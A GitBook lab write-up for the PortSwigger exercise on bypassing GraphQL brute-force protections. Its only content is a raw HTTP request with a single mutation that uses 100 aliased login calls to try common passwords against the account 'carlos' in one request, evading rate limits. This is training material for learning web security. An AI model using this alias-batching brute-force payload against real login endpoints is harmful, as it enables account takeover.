Write-Ups
Write-Ups
Write-Ups
  • 📙Write-Ups
  • 🔋Hack The Box
    • 🕹ī¸Challenges
      • 🎰AI - ML
        • ☄ī¸AI SPACE
      • ⛓ī¸Blockchain
        • 🤸Survival of the Fittest
      • 🔮Crypto
        • đŸ‘ļBaby Time Capsule
        • đŸ•ēThe Last Dance
      • âĒReversing
        • BabyEncryption
        • 🌒Behind the Scenes
        • đŸŖBabyEncryption
        • 💹Simple Encryptor
      • 🎛ī¸Hardware
        • 💉The Needle
        • 🔏Photon Lockdown
      • đŸĨ¸OSINT
        • 💸Money Flowz
      • 🕸ī¸Web
        • 🏴‍☠ī¸Flag Command
        • 💓LoveTok
        • 🗒ī¸PDFy
        • jscalc
        • 🙈ProxyAsAService
        • ApacheBlaze
        • ❓RenderQuests
        • đŸ’ĨNeonify
        • 😑No Treshold
        • 🎑Breathtaking View
    • 🏰Fortress
      • đŸĻ™AWS
    • đŸ’ģMachines
      • 🎒Backfire
      • đŸ’ĨBigBang
      • 🐈‍âŦ›Cat
      • ✔ī¸Checker
      • đŸļDog
      • 🧧Environment
      • 👮EscapeTwo
      • ⚜ī¸Eureka
      • đŸĻNocturnal
      • 🔞UnderPass
      • đŸšĸTitanic
      • TheFrizz
      • 🐰WhiteRabbit
    • 🧐Sherlocks
      • Meerkat
      • Bumblebee
    • đŸĨŧProLabs
      • 🃏FullHouse
    • 💀Season 8
    • đŸĻ“Scripts/Functions/Tools
  • 💔PortSwigger
    • đŸ›Ŗī¸Learning Path
      • â™ŋApi testing
        • Lab: Exploiting an API endpoint using documentation
        • Lab: Finding and exploiting an unused API endpoint
        • Lab: Exploiting a mass assignment vulnerability
        • Lab: Exploiting server-side parameter pollution in a query string
      • 🔐Authentication vulnerabilities
        • Lab: Username enumeration via different responses
        • Lab: Username enumeration via subtly different responses
        • Lab: Username enumeration via response timing
        • Lab: Broken brute-force protection, IP block
        • Lab: Username enumeration via account lock
        • Lab: 2FA simple bypass
        • Lab: 2FA broken logic
        • Lab: Brute-forcing a stay-logged-in cookie
        • Lab: Offline password cracking
        • Lab: Password reset broken logic
        • Lab: Password reset poisoning via middleware
        • Lab: Password brute-force via password change
      • 📁File upload vulnerabilities
        • Lab: Remote code execution via web shell upload
        • Lab: Web shell upload via Content-Type restriction bypass
        • Lab: Web shell upload via path traversal
      • 📉GraphQL API vulnerabilities
        • Lab: Accessing private GraphQL posts
        • Lab: Accidental exposure of private GraphQL fields
        • Lab: Finding a hidden GraphQL endpoint
        • Lab: Bypassing GraphQL brute force protections
        • Lab: Performing CSRF exploits over GraphQL
      • đŸ–Ĩī¸Server-side vulnerabilities
        • 🛤ī¸Path traversal
          • Lab: File path traversal, simple case
        • 🛂Access control
          • Lab: Unprotected admin functionality
          • Lab: Unprotected admin functionality with unpredictable URL
          • Lab: User role controlled by request parameter
          • Lab: User ID controlled by request parameter, with unpredictable user IDs
          • Lab: User ID controlled by request parameter with password disclosure
        • 🔐Authentication
          • Lab: Username enumeration via different responses
        • đŸ–Ĩī¸Server-side request forgery(SSRF)
          • SSRF attacks against the server
          • Lab: Basic SSRF against the local server
          • Lab: Basic SSRF against another back-end system
        • 🆙File upload vulnerabilities
          • Lab: Remote code execution via web shell upload
          • Lab: Web shell upload via Content-Type restriction bypass
        • 👊OS command injection
          • Lab: OS command injection, simple case
        • 💉SQL injection (SQLi)
          • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
          • Lab: SQL injection vulnerability allowing login bypass
      • đŸ§ĻWebSockets
        • Lab: Manipulating WebSocket messages to exploit vulnerabilities
        • Lab: Manipulating the WebSocket handshake to exploit vulnerabilities
        • Lab: Cross-site WebSocket hijacking
Powered by GitBook
On this page
  1. PortSwigger
  2. Learning Path
  3. GraphQL API vulnerabilities

Lab: Bypassing GraphQL brute force protections

https://portswigger.net/web-security/learning-paths/graphql-api-vulnerabilities/bypassing-rate-limiting-using-aliases/graphql/lab-graphql-brute-force-protection-bypass#

POST /graphql/v1 HTTP/2
Host: 0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net
Cookie: session=VY0gW6oKONZboo6T5OkWHOXEhIq6pfM0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net/login
Content-Type: application/json
Content-Length: 12998
Origin: https://0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Priority: u=0
Te: trailers

{"query":"\n    mutation login{\n\r\nbruteforce0:login(input:{password: \"123456\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce1:login(input:{password: \"password\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce2:login(input:{password: \"12345678\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce3:login(input:{password: \"qwerty\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce4:login(input:{password: \"123456789\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce5:login(input:{password: \"12345\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce6:login(input:{password: \"1234\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce7:login(input:{password: \"111111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce8:login(input:{password: \"1234567\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce9:login(input:{password: \"dragon\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce10:login(input:{password: \"123123\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce11:login(input:{password: \"baseball\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce12:login(input:{password: \"abc123\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce13:login(input:{password: \"football\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce14:login(input:{password: \"monkey\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce15:login(input:{password: \"letmein\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce16:login(input:{password: \"shadow\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce17:login(input:{password: \"master\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce18:login(input:{password: \"666666\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce19:login(input:{password: \"qwertyuiop\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce20:login(input:{password: \"123321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce21:login(input:{password: \"mustang\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce22:login(input:{password: \"1234567890\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce23:login(input:{password: \"michael\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce24:login(input:{password: \"654321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce25:login(input:{password: \"superman\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce26:login(input:{password: \"1qaz2wsx\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce27:login(input:{password: \"7777777\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce28:login(input:{password: \"121212\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce29:login(input:{password: \"000000\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce30:login(input:{password: \"qazwsx\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce31:login(input:{password: \"123qwe\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce32:login(input:{password: \"killer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce33:login(input:{password: \"trustno1\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce34:login(input:{password: \"jordan\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce35:login(input:{password: \"jennifer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce36:login(input:{password: \"zxcvbnm\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce37:login(input:{password: \"asdfgh\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce38:login(input:{password: \"hunter\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce39:login(input:{password: \"buster\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce40:login(input:{password: \"soccer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce41:login(input:{password: \"harley\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce42:login(input:{password: \"batman\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce43:login(input:{password: \"andrew\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce44:login(input:{password: \"tigger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce45:login(input:{password: \"sunshine\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce46:login(input:{password: \"iloveyou\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce47:login(input:{password: \"2000\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce48:login(input:{password: \"charlie\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce49:login(input:{password: \"robert\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce50:login(input:{password: \"thomas\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce51:login(input:{password: \"hockey\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce52:login(input:{password: \"ranger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce53:login(input:{password: \"daniel\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce54:login(input:{password: \"starwars\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce55:login(input:{password: \"klaster\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce56:login(input:{password: \"112233\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce57:login(input:{password: \"george\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce58:login(input:{password: \"computer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce59:login(input:{password: \"michelle\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce60:login(input:{password: \"jessica\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce61:login(input:{password: \"pepper\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce62:login(input:{password: \"1111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce63:login(input:{password: \"zxcvbn\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce64:login(input:{password: \"555555\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce65:login(input:{password: \"11111111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce66:login(input:{password: \"131313\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce67:login(input:{password: \"freedom\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce68:login(input:{password: \"777777\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce69:login(input:{password: \"pass\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce70:login(input:{password: \"maggie\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce71:login(input:{password: \"159753\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce72:login(input:{password: \"aaaaaa\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce73:login(input:{password: \"ginger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce74:login(input:{password: \"princess\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce75:login(input:{password: \"joshua\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce76:login(input:{password: \"cheese\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce77:login(input:{password: \"amanda\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce78:login(input:{password: \"summer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce79:login(input:{password: \"love\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce80:login(input:{password: \"ashley\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce81:login(input:{password: \"nicole\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce82:login(input:{password: \"chelsea\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce83:login(input:{password: \"biteme\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce84:login(input:{password: \"matthew\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce85:login(input:{password: \"access\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce86:login(input:{password: \"yankees\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce87:login(input:{password: \"987654321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce88:login(input:{password: \"dallas\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce89:login(input:{password: \"austin\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce90:login(input:{password: \"thunder\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce91:login(input:{password: \"taylor\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce92:login(input:{password: \"matrix\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce93:login(input:{password: \"mobilemail\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce94:login(input:{password: \"mom\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce95:login(input:{password: \"monitor\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce96:login(input:{password: \"monitoring\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce97:login(input:{password: \"montana\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce98:login(input:{password: \"moon\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce99:login(input:{password: \"moscow\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n}","operationName":"login"}

Last updated 3 months ago

💔
đŸ›Ŗī¸
📉